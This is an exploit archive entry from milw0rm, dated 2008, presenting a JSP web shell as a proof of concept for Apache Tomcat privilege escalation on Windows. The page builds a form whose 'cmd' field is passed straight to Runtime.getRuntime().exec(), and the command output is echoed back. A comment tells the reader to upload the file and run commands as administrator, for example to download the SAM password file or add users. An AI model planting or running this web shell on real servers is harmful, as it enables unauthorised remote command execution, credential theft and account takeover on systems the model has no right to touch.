Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win) 's

<%@ page import="java.util.*,java.io.*"%> <% %>  <%-- abysssec inc public material  just upload this file with abysssec.jsp and execute your command your command will run as administrator . you can download sam file add user or do anything you want . note : please be gentle and don't obstructionism . vulnerability discovered by : abysssec.com   --%> <HTML><BODY bgcolor=#0000000 and text=#DO0000> <title> Abysssec inc (abysssec.com) JSP vulnerability </tile> <center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Execute !"> </FORM> <pre> <% if (request.getParameter("cmd") != null) {         out.println("Command: " + request.getParameter("cmd") + "<BR>");         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));         OutputStream os = p.getOutputStream();         InputStream in = p.getInputStream();         DataInputStream dis = new DataInputStream(in);         String disr = dis.readLine();         while ( disr != null ) {                 out.println(disr);                 disr = dis.readLine();                 }         } %> </pre> </BODY></HTML>

# milw0rm.com [2008-11-28]